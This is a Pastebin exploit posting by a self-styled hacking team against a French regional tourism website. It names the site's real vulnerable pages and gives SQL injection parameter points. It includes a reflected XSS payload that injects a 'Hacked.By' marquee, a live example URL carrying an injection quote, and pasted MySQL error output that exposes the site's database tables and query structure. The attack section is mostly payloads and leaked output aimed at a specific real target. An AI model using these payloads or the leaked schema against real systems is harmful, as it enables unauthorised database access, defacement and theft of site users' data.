Advertisement
KingSkrupellos

Petites Cites Caractere des Pays de la Loire XSS SQL Inj

Oct 10th, 2019
416
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.00 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : France Petites Cites Caractere des Pays de la Loire XSS SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/10/2019
  7. # Vendor Homepage : patrimoine.paysdelaloire.fr
  8. fr-fr.facebook.com/petitescitesdecaractere.paysdelaloire/
  9. Information : fr.wikipedia.org/wiki/Petites_Cit%C3%A9s_de_caract%C3%A8re_de_France
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15. CWE-79 [ Improper Neutralization of Input During
  16. Web Page Generation ('Cross-site Scripting') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ###################################################################
  22.  
  23. # Impact :
  24. ***********
  25. France Petites Cites Caractere des Pays de la Loire is prone to an SQL-injection
  26. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  27. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  28. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  29. A remote attacker can send a specially crafted request to the vulnerable application and
  30. execute arbitrary SQL commands in application`s database. Further exploitation of this
  31. vulnerability may result in unauthorized data manipulation.
  32. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  33.  
  34. Reflected XSS (or Non-Persistent) :
  35. ***************************************
  36. The server reads data directly from the HTTP request and reflects it back in the HTTP response.
  37. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
  38. to a vulnerable web application, which is then reflected back to the victim and executed by the
  39. web browser. The most common mechanism for delivering malicious content is to include
  40. it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
  41. URLs constructed in this manner constitute the core of many phishing schemes, whereby
  42. an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
  43. the attacker's content back to the victim,the content is executed by the victim's browser.
  44.  
  45. ###################################################################
  46.  
  47. # SQL Injection Exploit :
  48. **********************
  49. /01_pratique.php?commune_id=[SQL Injection]
  50.  
  51. /01_decouverte.php?commune_id=[SQL Injection]
  52.  
  53. /02_offres_pagin.php?page=[ID-NUMBER]&ipp=[ID-NUMBER]&offre_commune=[ID-NUMBER]&radio1=[SQL Injection]
  54.  
  55. /02_agenda_pagin.php?commune_id=&agenda_chx=[ID-NUMBER]&page=[ID-NUMBER]&ipp=[SQL Injection]
  56.  
  57. # Cross Site Scripting XSS Exploit :
  58. ********************************
  59. /01_pratique.php?commune_id=1%27<marquee><font color=lime size=32>Hacked.By.KingSkrupellos</font></marquee>
  60.  
  61. ###################################################################
  62.  
  63. # Example Vulnerable Sites :
  64. *************************
  65. [+] pcc-paysdelaloire.fr/02_offres_pagin.php?page=28&ipp=4&offre_commune=13&radio1=1%27
  66.  
  67. ###################################################################
  68.  
  69. # Example SQL Database Error :
  70. ****************************
  71. Erreur n° 1064 :
  72. SELECT *,CASE WHEN PCC_offres_libelle_ville <> nom_cyvel THEN 0
  73. ELSE 1 END AS TRUC FROM PCC_offres,PCC_bo_bornes,PCC_communes,
  74. CK_communes WHERE PCC_bo_bornes.PCC_bo_bornes_id = 13 AND
  75. CK_communes.FRANCE_code_insee = PCC_bo_bornes.FRANCE_code_insee
  76. AND CK_communes.nom_cyvel = PCC_communes.PCC_communes_libelle
  77. AND PCC_communes.FRANCE_code_insee =PCC_offres.FRANCE_code_insee
  78. AND SUBSTR(PCC_offres_theme,1,1) = 1' AND (SELECT COUNT(*) FROM
  79. PCC_offres_black_list WHERE PCC_bl_id_offre = PCC_offres_id AND
  80. PCC_bl_theme_offre = PCC_offres_theme) = 0 GROUP BY PCC_offres_id
  81. ORDER BY TRUC DESC,PCC_offres_libelle_ville,PCC_offres_theme
  82. DESC,PCC_offres_libelle You have an error in your SQL syntax; check
  83. the manual that corresponds to your MySQL server version for the right
  84. syntax to use near '' AND (SELECT COUNT(*) FROM PCC_offres_
  85. black_list WHERE PCC_bl_id_offre ' at line 14 Erreur n° 1064 :
  86. Erreur n° 1064 :
  87. SELECT CK_communes.*,CK_departements.libelle_depart FROM CK_communes,
  88. CK_departements WHERE CK_communes.depart_id = CK_departements.departement_id
  89. AND CK_communes.FRANCE_code_insee =
  90. AND document_chemin <> '' AND document_fichier <> '' AND type_document_id = 1
  91. ORDER BY document_fichier ASC
  92. You have an error in your SQL syntax; check the manual that corresponds to your
  93. MySQL server version for the right syntax to use near
  94.  
  95. ###################################################################
  96.  
  97. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  98.  
  99. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement